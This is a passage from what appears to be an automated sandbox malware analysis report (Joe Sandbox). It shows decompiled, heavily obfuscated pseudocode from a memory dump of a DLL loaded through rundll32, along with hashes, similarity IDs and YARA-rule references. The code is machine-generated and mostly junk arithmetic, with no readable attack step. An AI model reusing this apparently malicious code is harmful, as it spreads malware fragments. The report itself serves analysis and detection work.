				 *(_t400 + 0xb0) =  *(_t400 + 0xb0) + _t330;
				 *(_t400 + 0x3d0) =  *(_t400 + 0x3d0) ^  *(_t400 + 0x358) - 0x00001ba7;
				r13d = r13d - ( *(_t400 + 0x298) *  *(_t400 + 0x108) ^ 0x00002114);
				 *(_t400 + 0x108) =  *(_t400 + 0x108) ^ ( *(_t400 + 0x420) &  *(_t400 + 0x230)) * _t394;
				 *((intOrPtr*)(_t400 + 0x80)) =  *((intOrPtr*)(_t400 + 0x80)) - (r13d |  *(_t400 + 0x3d0));
				r15d = r15d -  *((intOrPtr*)(_t403 + 0xe8));
				LeaveCriticalSection(_t427);
				_t416 =  *((intOrPtr*)(_t403 + 0x58));
				_t387 =  *(_t400 + 0x5d0) | _t416;
				if ( *(_t400 + 0x3a0) - _t387 > 0) goto 0x535f8bdb;
				r8d = r8d + 3;
				if (r8d - _t387 <= 0) goto 0x535f8bae;
				 *(_t400 + 0x1a8) =  *(_t400 + 0x1a8) ^ ( *(_t400 + 0x3d0) ^ _t416) +  *((intOrPtr*)(_t400 + 0x390));
				 *(_t400 + 0x330) =  *(_t400 + 0x330) |  *(_t400 + 0xb0) | 0x0000145c;
				return _t435 - 0x67b;
			}





























                0x7ffa535f84f0
                0x7ffa535f84f0
                0x7ffa535f84f3
                0x7ffa535f84f7
                0x7ffa535f84fb
                0x7ffa535f84ff
                0x7ffa535f850c
                0x7ffa535f8521
                0x7ffa535f852f
                0x7ffa535f8532
                0x7ffa535f853a
                0x7ffa535f8545
                0x7ffa535f8551
                0x7ffa535f8556
                0x7ffa535f855a
                0x7ffa535f8568
                0x7ffa535f856f
                0x7ffa535f8576
                0x7ffa535f857b
                0x7ffa535f8583
                0x7ffa535f858a
                0x7ffa535f8592
                0x7ffa535f859e
                0x7ffa535f85a6
                0x7ffa535f85b5
                0x7ffa535f85be
                0x7ffa535f85ce
                0x7ffa535f85e8
                0x7ffa535f85f5
                0x7ffa535f85ff
                0x7ffa535f860e
                0x7ffa535f8623
                0x7ffa535f8634
                0x7ffa535f8657
                0x7ffa535f867a
                0x7ffa535f8681
                0x7ffa535f868f
                0x7ffa535f869c
                0x7ffa535f869c
                0x7ffa535f86a6
                0x7ffa535f86a6
                0x7ffa535f86ad
                0x7ffa535f86bc
                0x7ffa535f86c7
                0x7ffa535f86ea
                0x7ffa535f870a
                0x7ffa535f8724
                0x7ffa535f874c
                0x7ffa535f8757
                0x7ffa535f876a
                0x7ffa535f8771
                0x7ffa535f8793
                0x7ffa535f879f
                0x7ffa535f87ac
                0x7ffa535f87b9
                0x7ffa535f87c7
                0x7ffa535f87e3
                0x7ffa535f87f9
                0x7ffa535f8800
                0x7ffa535f880a
                0x7ffa535f8812
                0x7ffa535f8817
                0x7ffa535f8845
                0x7ffa535f8860
                0x7ffa535f887b
                0x7ffa535f8898
                0x7ffa535f88b4
                0x7ffa535f88bb
                0x7ffa535f88be
                0x7ffa535f88cc
                0x7ffa535f88d2
                0x7ffa535f88ea
                0x7ffa535f88f4
                0x7ffa535f892d
                0x7ffa535f8949
                0x7ffa535f894e
                0x7ffa535f8956
                0x7ffa535f895e
                0x7ffa535f8964
                0x7ffa535f8975
                0x7ffa535f897b
                0x7ffa535f897d
                0x7ffa535f8985
                0x7ffa535f8991
                0x7ffa535f8998
                0x7ffa535f899f
                0x7ffa535f89a6
                0x7ffa535f89b4
                0x7ffa535f89d1
                0x7ffa535f89d8
                0x7ffa535f89e6
                0x7ffa535f89f6
                0x7ffa535f8a02
                0x7ffa535f8a05
                0x7ffa535f8a0d
                0x7ffa535f8a14
                0x7ffa535f8a1e
                0x7ffa535f8a28
                0x7ffa535f8a2d
                0x7ffa535f8a4b
                0x7ffa535f8a57
                0x7ffa535f8a5b
                0x7ffa535f8a66
                0x7ffa535f8a6f
                0x7ffa535f8a76
                0x7ffa535f8a7e
                0x7ffa535f8a85
                0x7ffa535f8a8c
                0x7ffa535f8a97
                0x7ffa535f8aa2
                0x7ffa535f8aa5
                0x7ffa535f8ab4
                0x7ffa535f8abf
                0x7ffa535f8acc
                0x7ffa535f8ad6
                0x7ffa535f8add
                0x7ffa535f8aeb
                0x7ffa535f8af2
                0x7ffa535f8af5
                0x7ffa535f8af9
                0x7ffa535f8b01
                0x7ffa535f8b16
                0x7ffa535f8b2a
                0x7ffa535f8b36
                0x7ffa535f8b4b
                0x7ffa535f8b5c
                0x7ffa535f8b63
                0x7ffa535f8b6e
                0x7ffa535f8b74
                0x7ffa535f8b87
                0x7ffa535f8b8d
                0x7ffa535f8bb5
                0x7ffa535f8bcb
                0x7ffa535f8bcd
                0x7ffa535f8bd4
                0x7ffa535f8bff

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID:
                • API String ID: 3168844106-0
                • Opcode ID: 674b92217082d28ebc46bafaa8bb58fd24d44a2029d38b6f4e4f2f4262ba438a
                • Instruction ID: 02d6a5a93a868638aef57833eff24a1c7189564729fb9462f7a3ca9041d7cce2
                • Opcode Fuzzy Hash: 674b92217082d28ebc46bafaa8bb58fd24d44a2029d38b6f4e4f2f4262ba438a
                • Instruction Fuzzy Hash: 74022272614BC48ADB74CF25D8847EA77A9F788B88F054126DB8D5BB58DF38D690CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F6898 Relevance: 2.8, APIs: 2, Instructions: 290COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 73%
                			E00007FFA7FFA535F6898(void* __ebx, void* __ecx, void* __rax, void* __rcx, void* __rdx, void* __r8, void* __r9) {
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed int _t166;
				signed int _t189;
				signed int _t210;
				signed int _t234;
				void* _t244;
				signed int _t245;
				signed long long _t282;
				signed long long _t289;
				void* _t294;
				signed int _t314;
				void* _t323;
				signed long long _t327;
				void* _t328;
				void* _t329;
				intOrPtr _t330;
				void* _t331;
				signed long long _t335;
				void* _t343;
				void* _t344;
				void* _t345;
				void* _t346;
				void* _t347;

				_t332 = __r8;
				_t323 = __rdx;
				r12d =  *(_t331 + 0xd0);
				r14d = __r8 - 0x1569;
				r8d =  *(_t331 + 0xf0);
				_t4 = _t323 - 0x54f; // -552
				r11d = _t4;
				_t244 = __r9 - 0x1ec0;
				 *(_t331 + 0xe0) =  *(_t331 + 0xe0) + 0x2bc;
				_t9 = _t323 + 0x54a; // 0x871
				r10d = _t9;
				_t330 =  *((intOrPtr*)(_t331 + 0xe8));
				_t11 = _t323 - 0x15fd; // -4822
				 *(_t331 + 0x50) = r11d;
				 *(_t331 + 0xf0) = __r8 + 0xd0;
				r13d = __rcx + 0x379;
				 *(_t331 + 0xd0) = r14d;
				r12d = r12d + 0xffffff29;
				 *(_t331 + 0xb0) = __rcx - 0x6c0;
				 *(_t331 + 0xc8) = r10d;
				r9d = r9d + 0xffffedd2;
				 *(_t331 + 0xc0) = __r8 - 0x1ad7;
				 *(_t331 + 0xd8) = r9d;
				r15d = __r8 - 0x1486;
				if (r11d - _t344 + 0xb13 > 0) goto 0x535f6ad9;
				 *((long long*)(_t330 + 0x430)) =  *((intOrPtr*)(_t330 + 0x150));
				r15d = r15d + 0xa5d;
				 *((long long*)( *(_t330 + 0x108) + 0x338)) = 0x262b;
				r14d = r14d + 0x1b47;
				 *( *(_t330 + 0x160) + 0x1a8) =  *( *((intOrPtr*)(_t330 + 0x2a0)) + 0x3b8) ^ 0x00001569;
				r8d =  *(_t331 + 0xe0);
				if (r11d - _t328 + 0xaf9 > 0) goto 0x535f6e7c;
				if (r11d == _t344 + 0x1305) goto 0x535f69f7;
				r14d = r14d - 0x89a;
				r13d = r13d - 0x319;
				if (r12d - _t345 - 0x887 >= 0) goto 0x535f6d8f;
				r10d =  *(_t331 + 0xf0);
				_t38 = _t332 - 0x249; // 0x73
				r11d = __r9 + 0x68e;
				r10d = r10d + 0xfffff9db;
				r9d = r9d + 0xf15;
				 *(_t331 + 0x38) = _t346 - 0x6f2;
				 *(_t331 + 0x30) = _t38;
				r8d = r8d + 0x94;
				 *(_t331 + 0x28) = r10d;
				 *(_t331 + 0x20) = r11d;
				_t166 = E00007FFA7FFA535F7A40(_t11 + 0x12ad, _t244,  *(_t330 + 0x160), _t294,  *( *((intOrPtr*)(_t330 + 0x2a0)) + 0x3b8) ^ 0x00001569, _t330, __r8, __r9, _t343);
				_t210 = _t328 + 0x467;
				_t245 = _t244 + 0x1582;
				r10d = _t345 - 0x4d9;
				 *(_t331 + 0x48) = r10d;
				r11d = _t346 + 0x2bc;
				 *(_t331 + 0x40) = r11d;
				r9d = _t344 + 0x9c7;
				 *(_t331 + 0x38) = r13d;
				r8d = _t346 - 0xbc;
				 *(_t331 + 0x30) = _t210;
				 *(_t331 + 0x28) =  *(_t331 + 0xd8) + 0x1348;
				r15d = _t166;
				 *(_t331 + 0x20) = _t245;
				E00007FFA7FFA535F9C34();
				r8d = 0x157a;
				E00007FFA7FFA535FAF30(0x1b47, _t294, _t330, _t329, _t330, _t330);
				goto 0x535f6e7c;
				r8d = _t210;
				goto 0x535f6b2e;
				if ( *(_t330 + 0x110) - 0x11f1 <= 0) goto 0x535f6b27;
				 *(_t330 + 0x240) =  *(_t330 + 0x240) * (r12d | 0x00001582);
				r8d = r8d + 3;
				if (r8d - ( *(_t330 + 0x340) | r14d) > 0) goto 0x535f6aee;
				 *((intOrPtr*)(_t331 + 0xb8)) = ( *(_t330 + 0x250) ^ 0x00001ba7) - r14d;
				if ( *((intOrPtr*)(_t330 + 0xa8)) -  *(_t331 + 0xf0) *  *(_t330 + 0x140) <= 0) goto 0x535f69c5;
				 *(_t331 + 0x58) =  *(_t331 + 0xb0) ^ r14d;
				r8d =  *(_t330 + 0x138);
				r8d = r8d + 0x1320;
				r12d = r12d * (r12d | 0x00001569);
				 *(_t330 + 0x320) =  *(_t330 + 0x320) * ( *(_t330 + 0x3d0) -  *((intOrPtr*)(_t330 + 0x5e0)) -  *(_t330 + 0x110));
				EnterCriticalSection(??);
				 *(_t330 + 0x158) =  *(_t330 + 0x158) - ( *(_t330 + 0x178) ^  *(_t331 + 0xc0));
				 *(_t331 + 0xe0) =  *(_t331 + 0xe0) - ( *(_t330 + 0x238) ^  *(_t331 + 0xd8) ^ 0x00001487);
				r11d =  *(_t330 + 0x128);
				r11d = r11d * _t210;
				r11d = r11d & r14d;
				 *(_t331 + 0x28) = r13d *  *(_t331 + 0xf0);
				 *(_t331 + 0x20) = r11d;
				GetLastError();
				_t234 =  *(_t331 + 0xd0);
				r8d =  *(_t331 + 0xe0);
				r9d =  *(_t331 + 0xd8);
				r8d = r8d +  *((intOrPtr*)(_t330 + 0x358)) - _t234;
				 *(_t331 + 0xe0) = r8d;
				 *(_t330 + 0x3d0) =  *(_t330 + 0x3d0) *  *(_t331 + 0x58);
				 *(_t331 + 0xd0) = _t234 ^  *((intOrPtr*)(_t330 + 0x38)) + 0xffffee0f + _t245;
				 *(_t330 + 0x160) =  *(_t330 + 0x160) | ( *(_t330 + 0x110) & r14d) -  *((intOrPtr*)(_t330 + 0x70));
				 *(_t330 + 0x410) =  *(_t330 + 0x410) * ( *(_t330 + 0x158) |  *(_t330 + 0x108));
				_t189 =  *(_t330 + 0x1d0) | 0x00000651;
				_t327 = _t189;
				 *(_t331 + 0xf0) = _t189;
				_t282 =  *((intOrPtr*)(_t330 + 0x2e0)) + _t327 | 0x0000157a;
				 *((intOrPtr*)(_t330 + 0x5d0)) =  *((intOrPtr*)(_t330 + 0x5d0)) + _t282;
				 *((intOrPtr*)(_t331 + 0xb8)) =  *((intOrPtr*)(_t331 + 0xb8)) + 1;
				if (_t282 -  *(_t330 + 0x140) * _t327 > 0) goto 0x535f6b74;
				r10d =  *(_t331 + 0xc8);
				r11d =  *(_t331 + 0x50);
				goto 0x535f69cd;
				_t314 = _t210;
				if (_t314 -  *(_t330 + 0x3d0) +  *((intOrPtr*)(_t330 + 0x168)) > 0) goto 0x535f6e7c;
				if (_t314 - ( *((intOrPtr*)(_t330 + 0x2a8)) + 0x00001ad7 ^  *(_t330 + 8)) >= 0) goto 0x535f6e7c;
				_t335 =  *(_t330 + 0x110);
				_t289 = r10d -  *((intOrPtr*)(_t330 + 0x230));
				 *((intOrPtr*)(_t330 + 0x58)) =  *((intOrPtr*)(_t330 + 0x58)) + _t289;
				 *(_t330 + 0x318) =  *(_t330 + 0x318) ^ _t289 * _t335;
				 *((intOrPtr*)(_t330 + 0x300)) =  *((intOrPtr*)(_t330 + 0x300)) + _t329 - 0x181f;
				r10d = r10d - (r15d | r13d) +  *((intOrPtr*)(_t330 + 0x420)) +  *((intOrPtr*)(_t330 + 0x2a8));
				 *(_t330 + 0x110) =  *(_t330 + 0x320) + 0xfffffab6 + _t335;
				 *((long long*)(_t330 + 0x418)) =  *((intOrPtr*)(_t330 + 0x198)) + 0x10ae;
				r15d = r15d ^  *(_t330 + 0x108) -  *((intOrPtr*)(_t330 + 0x58)) + 0x00001fda;
				 *(_t330 + 0x1d0) =  *(_t330 + 0x1d0) |  *(_t330 + 0x340) ^ 0x0000157a |  *(_t330 + 0x298) | r10d;
				return _t347 - 0x650;
			}




























                0x7ffa535f6898
                0x7ffa535f6898
                0x7ffa535f68a9
                0x7ffa535f68b1
                0x7ffa535f68b8
                0x7ffa535f68c0
                0x7ffa535f68c0
                0x7ffa535f68ce
                0x7ffa535f68d5
                0x7ffa535f68e0
                0x7ffa535f68e0
                0x7ffa535f68e7
                0x7ffa535f68ef
                0x7ffa535f68fc
                0x7ffa535f6901
                0x7ffa535f6908
                0x7ffa535f6915
                0x7ffa535f691d
                0x7ffa535f6924
                0x7ffa535f6932
                0x7ffa535f693a
                0x7ffa535f6941
                0x7ffa535f694e
                0x7ffa535f695e
                0x7ffa535f6968
                0x7ffa535f697b
                0x7ffa535f6982
                0x7ffa535f6990
                0x7ffa535f69b7
                0x7ffa535f69be
                0x7ffa535f69c5
                0x7ffa535f69d6
                0x7ffa535f69e7
                0x7ffa535f69e9
                0x7ffa535f69f0
                0x7ffa535f6a01
                0x7ffa535f6a07
                0x7ffa535f6a0f
                0x7ffa535f6a16
                0x7ffa535f6a1d
                0x7ffa535f6a2b
                0x7ffa535f6a32
                0x7ffa535f6a3c
                0x7ffa535f6a40
                0x7ffa535f6a47
                0x7ffa535f6a4f
                0x7ffa535f6a54
                0x7ffa535f6a59
                0x7ffa535f6a5f
                0x7ffa535f6a6c
                0x7ffa535f6a73
                0x7ffa535f6a78
                0x7ffa535f6a7f
                0x7ffa535f6a84
                0x7ffa535f6a8c
                0x7ffa535f6a91
                0x7ffa535f6a98
                0x7ffa535f6aac
                0x7ffa535f6ab0
                0x7ffa535f6ab3
                0x7ffa535f6ab7
                0x7ffa535f6ac1
                0x7ffa535f6acf
                0x7ffa535f6ad4
                0x7ffa535f6ae0
                0x7ffa535f6aec
                0x7ffa535f6af9
                0x7ffa535f6b20
                0x7ffa535f6b27
                0x7ffa535f6b31
                0x7ffa535f6b4a
                0x7ffa535f6b54
                0x7ffa535f6b6f
                0x7ffa535f6b90
                0x7ffa535f6ba1
                0x7ffa535f6ba8
                0x7ffa535f6bc3
                0x7ffa535f6bd0
                0x7ffa535f6bef
                0x7ffa535f6c0e
                0x7ffa535f6c1f
                0x7ffa535f6c3a
                0x7ffa535f6c4f
                0x7ffa535f6c74
                0x7ffa535f6c83
                0x7ffa535f6c88
                0x7ffa535f6c8e
                0x7ffa535f6c9b
                0x7ffa535f6ca6
                0x7ffa535f6cd1
                0x7ffa535f6ce4
                0x7ffa535f6cec
                0x7ffa535f6cf9
                0x7ffa535f6d04
                0x7ffa535f6d24
                0x7ffa535f6d31
                0x7ffa535f6d36
                0x7ffa535f6d39
                0x7ffa535f6d4a
                0x7ffa535f6d50
                0x7ffa535f6d6b
                0x7ffa535f6d77
                0x7ffa535f6d7d
                0x7ffa535f6d85
                0x7ffa535f6d8a
                0x7ffa535f6d9d
                0x7ffa535f6da3
                0x7ffa535f6dbd
                0x7ffa535f6dc3
                0x7ffa535f6dd3
                0x7ffa535f6dda
                0x7ffa535f6df5
                0x7ffa535f6e08
                0x7ffa535f6e21
                0x7ffa535f6e3b
                0x7ffa535f6e49
                0x7ffa535f6e6c
                0x7ffa535f6e75
                0x7ffa535f6e93

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CriticalEnterErrorLastSection
                • String ID:
                • API String ID: 3668107397-0
                • Opcode ID: e664c20afb270eb3d76d07312c65cf6c1bd6d9867d7d1aa7209a603ec08a79f5
                • Instruction ID: bbce37362446a5f7e6105aa051ec284556b92b8b0cbafd4f6406950cbdf6777d
                • Opcode Fuzzy Hash: e664c20afb270eb3d76d07312c65cf6c1bd6d9867d7d1aa7209a603ec08a79f5
                • Instruction Fuzzy Hash: EAE14773614AC58ED734CF24E8817EA77A9F788748F005126DB4E9BB98DB78E654CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F59E8 Relevance: 1.9, APIs: 1, Instructions: 352COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 81%
                			E00007FFA7FFA535F59E8(void* __eax, void* __ecx, void* __esi, long long __rbx, void* __rdx, long long __rsi, void* __r8, void* __r9, void* __r11) {
				void* __rdi;
				void* _t213;
				signed int _t220;
				signed int _t228;
				void* _t249;
				signed int _t251;
				void* _t255;
				void* _t261;
				void* _t262;
				void* _t270;
				intOrPtr _t301;
				void* _t321;
				void* _t360;
				intOrPtr _t363;
				void* _t373;
				long long _t377;
				void* _t379;
				void* _t380;
				long long _t383;
				void* _t385;
				long long _t392;
				signed short* _t393;
				intOrPtr _t401;
				signed long long _t402;
				signed long long _t406;
				CHAR* _t409;

				_t360 = __rdx;
				 *((long long*)(_t379 + 8)) = __rbx;
				 *((long long*)(_t379 + 0x18)) = _t377;
				 *((long long*)(_t379 + 0x20)) = __rsi;
				_t380 = _t379 - 0x70;
				_t5 = _t360 + 0x6c0; // 0x1b47
				r10d = _t5;
				_t373 = __r9;
				r9d =  *(_t380 + 0xf8);
				r11d = _t270 - 0x651;
				 *(_t380 + 0xf8) = r10d;
				r15d = _t270 + 0x14f6;
				 *((intOrPtr*)(_t380 + 0xa8)) = r11d;
				r8d = _t270 + 0x107d;
				 *((intOrPtr*)(_t380 + 0x58)) = r15d;
				 *((intOrPtr*)(_t380 + 0x50)) = __r9 - 0x1b47;
				r12d = _t321 - 0x4ca;
				 *(_t380 + 0xc8) =  *((intOrPtr*)(_t380 + 0xd0)) + 0xfffff9af;
				_t251 = _t321 - 0x181f;
				 *(_t380 + 0x60) = r12d;
				 *(_t380 + 0x108) = _t270 + 0x7f5;
				 *((intOrPtr*)(_t380 + 0xc0)) = _t270 - 0xc92;
				if (r10d - _t377 + 0x1320 <= 0) goto 0x535f5f2a;
				if (r8d ==  &(_t409[0x12f])) goto 0x535f5f2a;
				if (__r9 - 0x5c5 - __rsi + 0x1fda >= 0) goto 0x535f5e75;
				if ( *((long long*)(__r9 + 0x4a0)) == 0) goto 0x535f5f2a;
				 *( *((intOrPtr*)(__r9 + 0x160)) + 0x250) =  *( *((intOrPtr*)(__r9 + 0x160)) + 0x250) |  *( *((intOrPtr*)(__r9 + 0x20)) + 0x3c0) | 0x00000c92;
				 *((long long*)( *((intOrPtr*)(__r9 + 0x240)) + 0xb0)) =  *((long long*)( *((intOrPtr*)(__r9 + 0x240)) + 0xb0)) + 0xfe2db0b5;
				 *( *((intOrPtr*)(__r9 + 0x20)) + 0x130) =  *( *((intOrPtr*)(__r9 + 0x20)) + 0x130) |  *((intOrPtr*)(__r9 + 0x240)) + 0x000003c8;
				_t401 =  *((intOrPtr*)(__r9 + 0x120));
				_t406 =  *(__r9 + 0x2a8) ^ 0x00002111;
				r9d =  *( *((intOrPtr*)(__r9 + 0x5e8)) + 0x1b0);
				r9d = r9d ^ 0x00001fda;
				r11d =  *((intOrPtr*)(_t401 + 0x88 + _t406 * 8));
				_t392 = __r11 +  *((intOrPtr*)(__r9 + 0xe8));
				 *((long long*)(_t380 + 0x50)) = _t392;
				 *( *((intOrPtr*)(__r9 + 0x240)) + 0x128) =  *( *((intOrPtr*)(__r9 + 0x20)) + 0x238) ^ 0x0000157a;
				if (r9d -  *((intOrPtr*)(_t401 + 0x8c + _t406 * 8)) >= 0) goto 0x535f5f22;
				r8d = r9d;
				_t383 = __r8 + _t392;
				 *((long long*)(_t380 + 0x58)) = _t383;
				 *( *((intOrPtr*)(__r9 + 0x160)) + 0x128) =  *( *((intOrPtr*)(__r9 + 0x160)) + 0x128) |  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x240)) + 0x3a0)) - 0x000015fd;
				_t363 =  *((intOrPtr*)(__r9 + 0x20));
				 *(_t363 + 0x248) =  *(_t363 + 0x248) ^  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x5e8)) + 0x3c0)) + 0x00001515;
				r8d =  *(_t383 + 4);
				r9d = r9d +  *((intOrPtr*)( *(__r9 + 0x110) + 0x148)) + 0xffffecb3;
				_t385 = _t383 -  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0x68)) + 0x157a;
				 *( *((intOrPtr*)(__r9 + 0x20)) + 0x478) =  *( *((intOrPtr*)(__r9 + 0x20)) + 0x478) & 0x00000000;
				 *( *((intOrPtr*)(__r9 + 0x20)) + 0x140) =  *( *((intOrPtr*)(__r9 + 0x20)) + 0x140) ^  *((intOrPtr*)(__r9 + 0x130)) - 0x00000651;
				_t228 =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x5e8)) + 0x68)) - 0x1582;
				_t261 = _t228 - r8d;
				if (_t261 >= 0) goto 0x535f5e26;
				r8d = r8d - _t228;
				r12d = r8d;
				_t393 = _t363 + _t392 + _t228 * 2;
				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x20)) + 0x188)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x20)) + 0x188)) +  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x160)) + 0x110)) - 0x1569;
				 *( *(__r9 + 0x110) + 0x168) =  *( *((intOrPtr*)(__r9 + 0x240)) + 0x108) | 0x00000c92;
				r8d =  *_t393 & 0x0000ffff;
				r8d = r8d & 0x00000fff;
				r8d = r8d +  *((intOrPtr*)( *((intOrPtr*)(_t380 + 0x58))));
				r9d = r9d + ( *( *((intOrPtr*)(__r9 + 0x2a0)) + 0x70) ^ 0x00001485);
				 *( *((intOrPtr*)(__r9 + 0x5e8)) + 0x138) =  *( *((intOrPtr*)(__r9 + 0x5e8)) + 0x2e8) ^ 0x00001ba7;
				if (_t261 == 0) goto 0x535f5db3;
				if (_t261 == 0) goto 0x535f5d6f;
				if (_t261 == 0) goto 0x535f5d26;
				_t262 = (( *_t393 & 0x0000ffff) >> 0xc) - 0xffffffffffffffff - 7;
				if (_t262 != 0) goto 0x535f5dde;
				 *((intOrPtr*)( *(__r9 + 0x110) + 0x248)) =  *((intOrPtr*)( *(__r9 + 0x110) + 0x248)) + ( *( *((intOrPtr*)(__r9 + 0x20)) + 0x48) ^ 0x000016ce);
				 *( *(__r9 + 0x110) + 0x90) =  *( *(__r9 + 0x110) + 0x90) |  *( *((intOrPtr*)(__r9 + 0x2a0)) + 0x490) ^ 0x00000bbb;
				goto 0x535f5dd3;
				 *((long long*)( *((intOrPtr*)(__r9 + 0x160)) + 0x3d0)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x160)) + 0x28)) + 0x10ae;
				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x2a0)) + 0x248)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x2a0)) + 0x248)) + ( *( *(__r9 + 0x108) + 0x248) ^ 0x00001569);
				goto 0x535f5dd3;
				_t301 =  *((intOrPtr*)(__r9 + 0x5e8));
				 *((intOrPtr*)(__r9 + 0x80)) =  *((intOrPtr*)(__r9 + 0x80)) -  *(_t301 + 0x390) * 0x181f;
				 *((intOrPtr*)(_t385 +  *((intOrPtr*)(__r9 + 0xe8)))) =  *((intOrPtr*)(_t385 +  *((intOrPtr*)(__r9 + 0xe8)))) + _t301;
				 *( *((intOrPtr*)(__r9 + 0x358)) + 0x438) =  *( *((intOrPtr*)(__r9 + 0x358)) + 0x438) ^ 0x00003234;
				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0x390)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0x390)) + 0xffffef52 -  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x160)) + 0xa8));
				if (_t262 != 0) goto 0x535f5c84;
				 *( *(__r9 + 0x110) + 0x1a8) =  *( *(__r9 + 0x110) + 0x1a8) |  *( *((intOrPtr*)(__r9 + 0x240)) + 0x128);
				 *( *((intOrPtr*)(__r9 + 0x240)) + 0x128) =  *( *((intOrPtr*)(__r9 + 0x240)) + 0x128) - 1;
				 *((long long*)( *((intOrPtr*)(__r9 + 0x240)) + 0x3d0)) = 0x1d7f;
				if (r9d -  *((intOrPtr*)(_t401 + 0x8c + _t406 * 8)) < 0) goto 0x535f5b98;
				goto 0x535f5f1b;
				_t402 = r8d;
				if ( *((intOrPtr*)(__r9 + 0xc8)) - ( *(__r9 + 0x110) | _t402) * 0x1355 >= 0) goto 0x535f5f2a;
				_t220 = r12d * r8d;
				r12d = _t251;
				if (_t251 - _t220 <= 0) goto 0x535f5eed;
				r8d =  *(__r9 + 0x108);
				r8d = r8d |  *(_t380 + 0xc8);
				SetFileAttributesA(_t409);
				r12d = r12d + 4;
				if (r12d - _t220 > 0) goto 0x535f5eb8;
				r14d = r14d + 3;
				if (r14d - ( *(__r9 + 0x110) | _t402) * 0x1355 < 0) goto 0x535f5ea7;
				r10d =  *(_t380 + 0xf8);
				r15d =  *((intOrPtr*)(_t380 + 0x58));
				r11d =  *((intOrPtr*)(_t380 + 0xa8));
				r8d =  *(_t380 + 0x108);
				if (r15d - _t385 - 0x3d9 <= 0) goto 0x535f602c;
				 *((long long*)(__r9 + 0x1b8)) =  *((intOrPtr*)(__r9 + 0xb8));
				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0x198)) - ( *( *(__r9 + 0x108) + 0x248) | 0x00000651);
				 *( *(__r9 + 0x108) + 0x198) =  *( *(__r9 + 0x108) + 0x198) * ( *( *((intOrPtr*)(__r9 + 0x240)) + 0x398) | 0x0000181f);
				r8d = 0x1b47;
				 *((long long*)( *((intOrPtr*)(__r9 + 0x5e8)) + 0x338)) =  *((long long*)( *((intOrPtr*)(__r9 + 0x5e8)) + 0x338)) + 0xffffe7be;
				E00007FFA7FFA535FAF30(0x11f1,  *((intOrPtr*)(_t380 + 0x58)),  *((intOrPtr*)(__r9 + 0x358)), __rsi, _t377, __r9);
				_t190 = _t373 + 0x204; // 0x204
				 *((intOrPtr*)(__r9 + 0x400)) =  *(__r9 + 0x2a8) + 0xffffdf13;
				_t213 = E00007FFA7FFA535E3F50( *(__r9 + 0x2a8) + 0xffffdf13, 0x11f1, 0, _t249, _t255, _t190, __r9,  *(__r9 + 0x2a8) + 0xffffdf13);
				_t193 = _t373 + 0x258; // 0x258
				E00007FFA7FFA535E3F50(_t213, 0x11f1, 0, _t249, _t255, _t193, _t373,  *((intOrPtr*)(_t373 + 0x400)));
				return  *((intOrPtr*)(_t380 + 0xc0)) + 0x1515;
			}





























                0x7ffa535f59e8
                0x7ffa535f59e8
                0x7ffa535f59ed
                0x7ffa535f59f2
                0x7ffa535f5a00
                0x7ffa535f5a0b
                0x7ffa535f5a0b
                0x7ffa535f5a19
                0x7ffa535f5a1c
                0x7ffa535f5a2b
                0x7ffa535f5a32
                0x7ffa535f5a3a
                0x7ffa535f5a41
                0x7ffa535f5a49
                0x7ffa535f5a50
                0x7ffa535f5a69
                0x7ffa535f5a6d
                0x7ffa535f5a74
                0x7ffa535f5a7b
                0x7ffa535f5a81
                0x7ffa535f5a8c
                0x7ffa535f5a9f
                0x7ffa535f5aa9
                0x7ffa535f5ab9
                0x7ffa535f5ace
                0x7ffa535f5adc
                0x7ffa535f5afb
                0x7ffa535f5b09
                0x7ffa535f5b25
